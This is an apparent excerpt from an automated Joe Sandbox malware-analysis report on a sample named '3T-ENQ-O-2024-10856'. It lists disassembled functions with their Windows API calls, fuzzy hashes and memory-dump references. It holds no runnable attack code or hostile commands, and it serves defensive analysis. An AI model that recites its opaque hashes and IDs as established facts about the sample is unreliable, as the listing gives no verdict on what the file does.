                                • API String ID: 4031866154-3896280584
                                • Opcode ID: f2b5c4cd1ca6ea18a01fc68e99e9d73833ee490e1563447c7d4cdf429d673902
                                • Instruction ID: f66896f04c7b4f8c9bb5da3a53a5f46ff4225638ba5e7756290b533374792e48
                                • Opcode Fuzzy Hash: f2b5c4cd1ca6ea18a01fc68e99e9d73833ee490e1563447c7d4cdf429d673902
                                • Instruction Fuzzy Hash: C211D03A200306AFDB15AF74D859E7E77B9FF46364F44802AF806CB260EB319945D7A0
                                Function 00C93D46 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00C93D65
                                  • Part of subcall function 00C845EC: __FF_MSGBANNER.LIBCMT ref: 00C84603
                                  • Part of subcall function 00C845EC: __NMSG_WRITE.LIBCMT ref: 00C8460A
                                  • Part of subcall function 00C845EC: RtlAllocateHeap.NTDLL(00DD0000,00000000,00000001,?,?,?,?,00C80127,?,00C6125D,00000058,?,?), ref: 00C8462F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AllocateHeap_free
                                • String ID:
                                • API String ID: 614378929-0
                                • Opcode ID: 99b7254d15715d32d128b0a63e05a40d21da3d34e81a3a3cbe22a6addc9e44c1
                                • Instruction ID: cbf359a1a5cac963d92674f0d9476b68eee58a582d3f4cca35521ceb4fff637f
                                • Opcode Fuzzy Hash: 99b7254d15715d32d128b0a63e05a40d21da3d34e81a3a3cbe22a6addc9e44c1
                                • Instruction Fuzzy Hash: 2A110633914651ABDF313F70AC5C7AA3BA8AF00364B504425F91ADA5A2DF308A40D754
                                Function 00CA713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00CA715C
                                • _memset.LIBCMT ref: 00CA717D
                                • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00CA71CF
                                • CloseHandle.KERNEL32(00000000), ref: 00CA71D8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CloseControlCreateDeviceFileHandle_memset
                                • String ID:
                                • API String ID: 1157408455-0
                                • Opcode ID: 61d8e74e274752a0b4ae53eaebf59dbe75e3d1716ce214bdee3e7f8777045ecf
                                • Instruction ID: 414daab7db553aa9c9cb6e41ae151593a9ac14d51aba2a897643e55bd36af2fa
                                • Opcode Fuzzy Hash: 61d8e74e274752a0b4ae53eaebf59dbe75e3d1716ce214bdee3e7f8777045ecf
                                • Instruction Fuzzy Hash: F911EC729012287AD7306B65AC4DFEFBABCEF45764F10429AF509E71D0D2744F808BA4
                                Function 00CA13D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00CA13EE
                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00CA1409
                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00CA141F
                                • FreeLibrary.KERNEL32(?), ref: 00CA1474
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                • String ID:
                                • API String ID: 3137044355-0
                                • Opcode ID: 1074057c00dfcbfe5bdc856cf9fb8ced98e7ed513f6972888b0b6e81b2f5003d
                                • Instruction ID: 29a40b234fa71b5a1d832acf7c5f711b73db280f5ae0ec1766c1ca49b48ccb20
                                • Opcode Fuzzy Hash: 1074057c00dfcbfe5bdc856cf9fb8ced98e7ed513f6972888b0b6e81b2f5003d
                                • Instruction Fuzzy Hash: 5421AF7150020AAFDB209F95DC88ADABBB8EF05748F048469A92297010D774EA44DF51
                                Function 00CB92C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C7F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00CAAEA5,?,?,00000000,00000008), ref: 00C7F282
                                  • Part of subcall function 00C7F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00CAAEA5,?,?,00000000,00000008), ref: 00C7F2A6
                                • gethostbyname.WSOCK32(?,?,?), ref: 00CB92F0
                                • WSAGetLastError.WSOCK32(00000000), ref: 00CB92FB
                                • _memmove.LIBCMT ref: 00CB9328
                                • inet_ntoa.WSOCK32(?), ref: 00CB9333
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                • String ID:
                                • API String ID: 1504782959-0
                                • Opcode ID: d2b80bc84df8043811f8bd6b86defaa1992767420419c2b2d9dc7b3db4d8fab7
                                • Instruction ID: 5f52bf430fb8b9fa2525c45873c0f36ac372c5fcd7169aa2d54ecb51b5341e0b
                                • Opcode Fuzzy Hash: d2b80bc84df8043811f8bd6b86defaa1992767420419c2b2d9dc7b3db4d8fab7
                                • Instruction Fuzzy Hash: E4114F76500109AFCB14FBA4CD96DEE77B9EF08314B144065F506A72A2DF30EE05EB62
                                Function 00C9C265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00C9C285
                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C9C297
                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C9C2AD
                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C9C2C8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: fa18afb7071b8478c36d6025da7fffad29dd757d0162e7758b979c3f74468bbf
                                • Instruction ID: 1ee742aa35ac4b088882fd1994fdca1d837e020cbd5ad987ad040f791f6e6318
                                • Opcode Fuzzy Hash: fa18afb7071b8478c36d6025da7fffad29dd757d0162e7758b979c3f74468bbf
                                • Instruction Fuzzy Hash: 4C11187A940218FFDF11DBD9C885F9DBBB8FB08710F204091EA15B7294D671AE10DB94
                                Function 00CA7C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 00CA7C6C
                                • MessageBoxW.USER32(?,?,?,?), ref: 00CA7C9F
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00CA7CB5
                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00CA7CBC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                • String ID:
                                • API String ID: 2880819207-0
                                • Opcode ID: e090e814ce3d9bfb8f0d8ea62c550f314f92762d7afb882463d436ae208092cc
                                • Instruction ID: 240c861d53d63c929afeaea78927b0b8d2f49381146a424aeebf9d077eeea264
                                • Opcode Fuzzy Hash: e090e814ce3d9bfb8f0d8ea62c550f314f92762d7afb882463d436ae208092cc
                                • Instruction Fuzzy Hash: 20110472A04358BFC712AFACDC48B9E7FADAB45338F144255F826D3391D6708A0587B5
                                Function 00C7C619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                Download Yara Rule
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C7C657
                                • GetStockObject.GDI32(00000011), ref: 00C7C66B
                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C7C675
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CreateMessageObjectSendStockWindow
                                • String ID:
                                • API String ID: 3970641297-0
                                • Opcode ID: eb94b17cc82fb998c0bf0096ae583e4b92c770eb817b461cd2d45dddef5e991e
                                • Instruction ID: f8c17c9893e5af47cb69f7c616778516cf69d82fbde9fa524c1b65181578149b
                                • Opcode Fuzzy Hash: eb94b17cc82fb998c0bf0096ae583e4b92c770eb817b461cd2d45dddef5e991e
                                • Instruction Fuzzy Hash: 7F11A172501649BFDB114FA18CC0FEABB6DFF08364F058119FA1956110C732DD60DBA0
                                Function 00CA49D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                Download Yara Rule
                                APIs
                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CA354D,?,00CA45D5,?,00008000), ref: 00CA49EE
                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00CA354D,?,00CA45D5,?,00008000), ref: 00CA4A13
                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CA354D,?,00CA45D5,?,00008000), ref: 00CA4A1D
                                • Sleep.KERNEL32(?,?,?,?,?,?,?,00CA354D,?,00CA45D5,?,00008000), ref: 00CA4A50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CounterPerformanceQuerySleep
                                • String ID:
                                • API String ID: 2875609808-0
                                • Opcode ID: 1bd2181db2331c4c566b6081a0f0355b8638353d40d3ebb27b483e7a495a929a
                                • Instruction ID: 074d0a4b5e7d6d230868b5ab03ce1329ae519a5fde50de4d323e159a5df77dcc
                                • Opcode Fuzzy Hash: 1bd2181db2331c4c566b6081a0f0355b8638353d40d3ebb27b483e7a495a929a
                                • Instruction Fuzzy Hash: EF11A031D40619DBCF04EFE5D989BEEBB34FF4A315F004085E942B6140CB709950D799
                                Function 00C95BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                • String ID:
                                • API String ID: 3016257755-0
                                • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                • Instruction ID: 9cdae9cddea5f37bd3ab9e0ec2f5cbbc5c36d3f52d649f9d5b21c3c90aa8cb81
                                • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                • Instruction Fuzzy Hash: C5014B3200064EBBCF135F84DC49CEE3F62BB1C350B588815FE2859031D236CAB1AB81
                                Function 00C880E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C8869D: __getptd_noexit.LIBCMT ref: 00C8869E
                                • __lock.LIBCMT ref: 00C8811F
                                • InterlockedDecrement.KERNEL32(?), ref: 00C8813C
                                • _free.LIBCMT ref: 00C8814F
                                • InterlockedIncrement.KERNEL32(00DE2710), ref: 00C88167
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                • String ID:
                                • API String ID: 2704283638-0
                                • Opcode ID: 8a9aaa1f6a48d5f5994f7129d39a5943a9671cd28806fe65b2f92ba61bdc6623
                                • Instruction ID: d3838cd699fb8a30c77c65b9aeceb3117d85cb7ebfcfde9aa546ccbc4f31f93a
                                • Opcode Fuzzy Hash: 8a9aaa1f6a48d5f5994f7129d39a5943a9671cd28806fe65b2f92ba61bdc6623
                                • Instruction Fuzzy Hash: 4501C431902B11ABCB12BF68980E79DB360BF00728F444105F820A7BD1DF346946DBEA
                                Function 00CCDDEE Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                Download Yara Rule
                                APIs
                                • GetWindowRect.USER32(?,?), ref: 00CCDE07
                                • ScreenToClient.USER32(?,?), ref: 00CCDE1F
                                • ScreenToClient.USER32(?,?), ref: 00CCDE43
                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CCDE5E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ClientRectScreen$InvalidateWindow
                                • String ID:
                                • API String ID: 357397906-0
                                • Opcode ID: 49918d244da5e3942403a5b256ce86e059a78e7a37c4d013f48d1add2d0df8f7
                                • Instruction ID: b5467e07882b9f43bb0c624485414caf460b689fd4e60d1226eee2308d0ac6ea
                                • Opcode Fuzzy Hash: 49918d244da5e3942403a5b256ce86e059a78e7a37c4d013f48d1add2d0df8f7
                                • Instruction Fuzzy Hash: F1112DB9D00249EFDB41DFA8C884AEEBBF9FB08310F108566E925E7210D735AA55CF50
                                Function 00C88724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __lock.LIBCMT ref: 00C88768
                                  • Part of subcall function 00C88984: __mtinitlocknum.LIBCMT ref: 00C88996
                                  • Part of subcall function 00C88984: EnterCriticalSection.KERNEL32(00C80127,?,00C8876D,0000000D), ref: 00C889AF
                                • InterlockedIncrement.KERNEL32(DC840F00), ref: 00C88775
                                • __lock.LIBCMT ref: 00C88789
                                • ___addlocaleref.LIBCMT ref: 00C887A7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                • String ID:
                                • API String ID: 1687444384-0
                                • Opcode ID: 946d6f1de0cc1764b9d9abb6889c99c5fccb03c6fc389561601c7e737cf03b75
                                • Instruction ID: 2c46f28cf0d4116b1351b2e39860a7338a457142d5c5535ee04960e527923e8c
                                • Opcode Fuzzy Hash: 946d6f1de0cc1764b9d9abb6889c99c5fccb03c6fc389561601c7e737cf03b75
                                • Instruction Fuzzy Hash: 59016D71441B00EFD720EF65D905799B7F0AF40329F20890EE0AA877A0DF74A644DB15
                                Function 00CCE13E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 00CCE14D
                                • _memset.LIBCMT ref: 00CCE15C
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D23EE0,00D23F24), ref: 00CCE18B
                                • CloseHandle.KERNEL32 ref: 00CCE19D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memset$CloseCreateHandleProcess
                                • String ID:
                                • API String ID: 3277943733-0
                                • Opcode ID: 0df0c2c5b2f23db85b6646725718489b9618bb218e48562ef53381e44fa25286
                                • Instruction ID: 7d03f5883acd4562cf577cd0daf0b267c77efffb58fcfaf479c8feecd1968096
                                • Opcode Fuzzy Hash: 0df0c2c5b2f23db85b6646725718489b9618bb218e48562ef53381e44fa25286
                                • Instruction Fuzzy Hash: BAF054F1A40310BEE2106B65BC46F7B7AACDF16368F040420FE04D9292D3BA4E1157B8
                                Function 00CA9C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(?), ref: 00CA9C7F
                                  • Part of subcall function 00CAAD14: _memset.LIBCMT ref: 00CAAD49
                                • _memmove.LIBCMT ref: 00CA9CA2
                                • _memset.LIBCMT ref: 00CA9CAF
                                • LeaveCriticalSection.KERNEL32(?), ref: 00CA9CBF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                • String ID:
                                • API String ID: 48991266-0
                                • Opcode ID: 319ddf22e7b329e7389cb2baacb69616482d4c5cdcfa833f1379a822059e0483
                                • Instruction ID: f49a2d87ac27029e131c046ac9c5671bee95fd688b02f0564e9e0c01ccb9ddcc
                                • Opcode Fuzzy Hash: 319ddf22e7b329e7389cb2baacb69616482d4c5cdcfa833f1379a822059e0483
                                • Instruction Fuzzy Hash: 75F05476200000ABCF016F54EC85B49BB29EF45325F08C065FE095E217C732EC11EBB5
                                Function 00CCE83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C7B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00C7B5EB
                                  • Part of subcall function 00C7B58B: SelectObject.GDI32(?,00000000), ref: 00C7B5FA
                                  • Part of subcall function 00C7B58B: BeginPath.GDI32(?), ref: 00C7B611
                                  • Part of subcall function 00C7B58B: SelectObject.GDI32(?,00000000), ref: 00C7B63B
                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CCE860
                                • LineTo.GDI32(00000000,?,?), ref: 00CCE86D
                                • EndPath.GDI32(00000000), ref: 00CCE87D
                                • StrokePath.GDI32(00000000), ref: 00CCE88B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                • String ID:
                                • API String ID: 1539411459-0
                                • Opcode ID: 1d828590f0f75cb846a03398bad775dc3102cccf84ecb0d4bf97fad793172988
                                • Instruction ID: c286b5d13ef0a9d2617a25badc9395b67dccc9293183c989c27b8383ddfddc22
                                • Opcode Fuzzy Hash: 1d828590f0f75cb846a03398bad775dc3102cccf84ecb0d4bf97fad793172988
                                • Instruction Fuzzy Hash: 7DF0E231000299BBDB265F54AC0EFCE3F99AF16321F048101FF12680E1C3794612CFA5
                                Function 00C9D623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C9D640
                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C9D653
                                • GetCurrentThreadId.KERNEL32 ref: 00C9D65A
                                • AttachThreadInput.USER32(00000000), ref: 00C9D661
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
